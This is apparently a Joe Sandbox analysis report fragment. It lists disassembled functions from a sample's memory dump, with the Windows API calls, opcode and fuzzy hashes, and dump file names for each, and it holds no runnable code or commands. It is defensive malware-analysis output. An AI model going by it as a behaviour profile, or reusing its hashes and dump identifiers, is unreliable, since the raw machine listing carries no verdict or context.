String ID:
API String ID: 4210589936-0
Opcode ID: a9ac2ffa2db6abfb076940c2fe0e547ca112d20859979057998cc184c603cae3
Instruction ID: 7e8a3d6412d9633a58b63ebcb60c5a6d8a141699c66324f03f09b183ace82f38
Opcode Fuzzy Hash: a9ac2ffa2db6abfb076940c2fe0e547ca112d20859979057998cc184c603cae3
Instruction Fuzzy Hash: 95418F31504119FFEF159F68C844AFABBB5BB46360F108359F829922D1C774AD90DF94

Function 006CC145 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 006CC156
PostMessageW.USER32(?,00000201,00000001), ref: 006CC200
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 006CC208
PostMessageW.USER32(?,00000202,00000000), ref: 006CC216
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 006CC21E

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 303d1b694efb9c9cddf133cf6ee41967e7a63a626fb6fd5538bf60bf46a12934
Instruction ID: 2b6417f7bfd5596913f2bf5ce874e2a9fddcd9da0eb6ca958397833b63de01ca
Opcode Fuzzy Hash: 303d1b694efb9c9cddf133cf6ee41967e7a63a626fb6fd5538bf60bf46a12934
Instruction Fuzzy Hash: B131BF71500219EBDB14CFA8DD4CBEE3BB6EB04325F108219F824A62D1C7B49D04DB90

Function 006CE9B5 Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 006CE9CD
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 006CE9EA
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 006CEA22
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 006CEA48
_wcsstr.LIBCMT ref: 006CEA52

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: eb62bc9aa467c1dec998bab56ce7bbc99a19ce8a6d0bf598948446e3422ac777
Instruction ID: 73ac548e8f976e0c20e13ec8a9f79e9a9d25265c91b7339769005364363583bc
Opcode Fuzzy Hash: eb62bc9aa467c1dec998bab56ce7bbc99a19ce8a6d0bf598948446e3422ac777
Instruction Fuzzy Hash: 8921D7722042007EEB259BA9DC45FBB7FBAEF45750F10C02DF809CA191EA76DC419754

Function 006FDC79 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 006AAF7D: GetWindowLongW.USER32(?,000000EB), ref: 006AAF8E

GetWindowLongW.USER32(?,000000F0), ref: 006FDCC0
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 006FDCE4
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 006FDCFC
GetSystemMetrics.USER32(00000004), ref: 006FDD24
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,006E407D,00000000), ref: 006FDD42

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: f79ecb47e7cdc5b5b243110d205bdc5976f04cfb12d0e51de34cc570157b212e
Instruction ID: 9e913f509de8ab18b06f219616d55206e1dbb2067417de6de7a0e50833f7ed04
Opcode Fuzzy Hash: f79ecb47e7cdc5b5b243110d205bdc5976f04cfb12d0e51de34cc570157b212e
Instruction Fuzzy Hash: F221AE71600219AFCB205F788C48BB937ABBF46375B108724FA26C62E0D371AC50CB80

Function 006CCA6D Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 006CCA86

Part of subcall function 00697E53: _memmove.LIBCMT ref: 00697EB9

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 006CCAB8
__itow.LIBCMT ref: 006CCAD0
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 006CCAF6
__itow.LIBCMT ref: 006CCB07

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: 6ca3feeb3d754c33d173aab6791a254dcfe8c3e6479917a0a6157e3a7677acd5
Instruction ID: b0dbcd9c7f91e17b91013dad1dd75606f670f38c1af5ad0c6897274de81f16a4
Opcode Fuzzy Hash: 6ca3feeb3d754c33d173aab6791a254dcfe8c3e6479917a0a6157e3a7677acd5
Instruction Fuzzy Hash: 7D21CC717006147BDF21EAE89C47FEE7AAAEF49760F04402CF909D7281DA74CD4587A4

Function 006E89AD Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 006E89CE
GetForegroundWindow.USER32 ref: 006E89E5
GetDC.USER32(00000000), ref: 006E8A21
GetPixel.GDI32(00000000,?,00000003), ref: 006E8A2D
ReleaseDC.USER32(00000000,00000003), ref: 006E8A68

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: acd189231fe72952e9e3853924fd6350b4059ba3826070535f72a81b27c8564a
Instruction ID: 8f0502fc350b826cd54cbc8073a55418a724cea148985eedeaca0afc7aa80ef5
Opcode Fuzzy Hash: acd189231fe72952e9e3853924fd6350b4059ba3826070535f72a81b27c8564a
Instruction Fuzzy Hash: 2A219975A00204AFDB10EF69CC85A9A7BF5EF44341F05C47DE54997352DB74AD04CB54

Function 006AB58B Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 006AB5EB
SelectObject.GDI32(?,00000000), ref: 006AB5FA
BeginPath.GDI32(?), ref: 006AB611
SelectObject.GDI32(?,00000000), ref: 006AB63B

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 5fa8bfc4856726cddee941595dbea4bd19abdcf4819f36b3e35d2445989ae777
Instruction ID: 533f5c8dfddfef1cd313822639bac266d9d2e3d662997b6683bf774f87eb474b
Opcode Fuzzy Hash: 5fa8bfc4856726cddee941595dbea4bd19abdcf4819f36b3e35d2445989ae777
Instruction Fuzzy Hash: 0E215370800305EBDB30AF19ED447D97BE9F711327F549116E411962E1D3B8AD91DF58

Function 006B2E57 Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 006B2E81
CreateThread.KERNEL32(?,?,006B2FB7,00000000,?,?), ref: 006B2EC5
GetLastError.KERNEL32 ref: 006B2ECF
_free.LIBCMT ref: 006B2ED8
__dosmaperr.LIBCMT ref: 006B2EE3

Part of subcall function 006B889E: __getptd_noexit.LIBCMT ref: 006B889E

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
String ID:
API String ID: 2664167353-0
Opcode ID: cb58ff79cb5568b47217f5433a5331b5559f2d690446041978088252df0a095d
Instruction ID: c24ca70e1b08829aebeb13eae8aeab269d5bd866bf419c1716274b4d8257233d
Opcode Fuzzy Hash: cb58ff79cb5568b47217f5433a5331b5559f2d690446041978088252df0a095d
Instruction Fuzzy Hash: 7111A5B2104706AF9760BF669C41DEB7BEAEF45760B10452DF91487192EB35C8818764

Function 006CB8E7 Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 006CB903
GetLastError.KERNEL32(?,006CB3CB,?,?,?), ref: 006CB90D
GetProcessHeap.KERNEL32(00000008,?,?,006CB3CB,?,?,?), ref: 006CB91C
RtlAllocateHeap.NTDLL(00000000,?,006CB3CB), ref: 006CB923
GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 006CB93A

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
String ID:
API String ID: 883493501-0
Opcode ID: 6f51bfd182122a5dede0ac780b1420a577b3dfc55dbcf3a85cde7f7a11fe5003
Instruction ID: 98666c51da63c39f65c2e5c5bf08db799164c2a495cf272c2611d290a73ce01a
Opcode Fuzzy Hash: 6f51bfd182122a5dede0ac780b1420a577b3dfc55dbcf3a85cde7f7a11fe5003
Instruction Fuzzy Hash: 4D016271201208BFDB214FA9DC49EB73BAEEF86764B108029F555C3250D7798C40DE60

Function 006D8355 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 006D8371
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 006D837F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 006D8387
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 006D8391
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 006D83CD

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 63afff64bebb32be970a8e7114b111ff510f88d222ad39347a236c2bc0598243
Instruction ID: 176414c36a5286c11ab7a18cea70f03a9b2b6095d067fabdda2c92342a112b01
Opcode Fuzzy Hash: 63afff64bebb32be970a8e7114b111ff510f88d222ad39347a236c2bc0598243
Instruction Fuzzy Hash: 68015B31C0062DEFCF10ABE8EC4CADEBB79BB08B01F024042E505B3280CB7499508BA5

Function 006CA857 Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.COMBASE ref: 006CA874
ProgIDFromCLSID.COMBASE(?,00000000), ref: 006CA88F
lstrcmpiW.KERNEL32(?,00000000), ref: 006CA89D
CoTaskMemFree.COMBASE(00000000), ref: 006CA8AD
CLSIDFromString.COMBASE(?,?), ref: 006CA8B9

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: f947abdd02259edd8795cc731e4f3171f2f8b39f783c208e2b5546b128452f84
Instruction ID: b11b3b161b747a49faf1552d2ae4cdd011e3a652ccd4696251f06a93ab2fc42c
Opcode Fuzzy Hash: f947abdd02259edd8795cc731e4f3171f2f8b39f783c208e2b5546b128452f84
Instruction Fuzzy Hash: D6014B76601218AFDB215FA8DC84BEABBEEEF44799F14C028F901D2250E774DD419FA1

Function 006CB7EF Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 006CB806
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 006CB810
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006CB81F
RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 006CB826
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006CB83C

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: HeapInformationToken$AllocateErrorLastProcess
String ID:
API String ID: 47921759-0
Opcode ID: 7da3bce0c6b61690c07db50599484024fb9041ac1038ea6e78e3466071ad102a
Instruction ID: 47dd9ed4f581f73766b9fc9e5b5840e2b3737c13eb24a9541040c879a8235a82
Opcode Fuzzy Hash: 7da3bce0c6b61690c07db50599484024fb9041ac1038ea6e78e3466071ad102a
Instruction Fuzzy Hash: 10F03775201218AFEB215FA9EC99FBB3B6DFF4A754F008029F941C6290CBA49C419E64

Function 006CB78E Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 006CB7A5
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 006CB7AF
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 006CB7BE
RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 006CB7C5
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 006CB7DB

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: HeapInformationToken$AllocateErrorLastProcess
String ID:
API String ID: 47921759-0
Opcode ID: 6332cb0ab2b380fb676b9dc05cd0ad52d7a68366d24b7565493e21f5ea9f409b
Instruction ID: bbc8a94f29adc8209bb35401de852b3ea59eb5d3d97f3a5ad5a311ed7a991a01
Opcode Fuzzy Hash: 6332cb0ab2b380fb676b9dc05cd0ad52d7a68366d24b7565493e21f5ea9f409b
Instruction Fuzzy Hash: 72F031752402546FDB205FA99C89FFB3BADFF89755F108019F941C6290D7649C419B70

Function 006CFA7B Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 006CFA8F
GetWindowTextW.USER32(00000000,?,00000100), ref: 006CFAA6
MessageBeep.USER32(00000000), ref: 006CFABE
KillTimer.USER32(?,0000040A), ref: 006CFADA
EndDialog.USER32(?,00000001), ref: 006CFAF4

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: c91aaec609c95dc46ddce07018388fa576855dc305f6bc93e5e03abaf78919ac
Instruction ID: 7b1ad712a35337ca934e233623148ee06bc5427b0da2f554a6dee56a11fb87d4
Opcode Fuzzy Hash: c91aaec609c95dc46ddce07018388fa576855dc305f6bc93e5e03abaf78919ac
Instruction Fuzzy Hash: 6E014F30500704ABEB35AB54DD4EFE6B7BAFB00705F04816DA147A51E0DBE5A9548E44

Function 006AB517 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 006AB526
StrokeAndFillPath.GDI32(?,?,0070F583,00000000,?), ref: 006AB542
SelectObject.GDI32(?,00000000), ref: 006AB555
DeleteObject.GDI32 ref: 006AB568
StrokePath.GDI32(?), ref: 006AB583

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 0d6020dd40a16d14e36a1a8897fd9e3d7b03be5cc889b788c7241dd24fe95ecb
Instruction ID: fb97bcb95afb27160bc0b39027ae67e37e8dc8b185988da7f784e79264d70130
Opcode Fuzzy Hash: 0d6020dd40a16d14e36a1a8897fd9e3d7b03be5cc889b788c7241dd24fe95ecb
Instruction Fuzzy Hash: F8F0A430400708ABDB256F69ED087D43FE6A702337F54C214E4A9482F1C7B89DA6DF18

Function 006DFA15 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 006DFAB2
CoCreateInstance.COMBASE(0071DA7C,00000000,00000001,0071D8EC,?), ref: 006DFACA

Part of subcall function 0069CAEE: _memmove.LIBCMT ref: 0069CB2F

CoUninitialize.COMBASE ref: 006DFD2D

Strings

.lnk, xrefs: 006DFA63, 006DFA68, 006DFA76

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: 6d9c17f03010f9a17f6bc6346dbc5885d363ec59feb30bedf394393f3aaed4cd
Instruction ID: 50f7a85bfd789d6b962980d7bbefadadb165c00b3ffe0679a3c6e6691b91ab5b
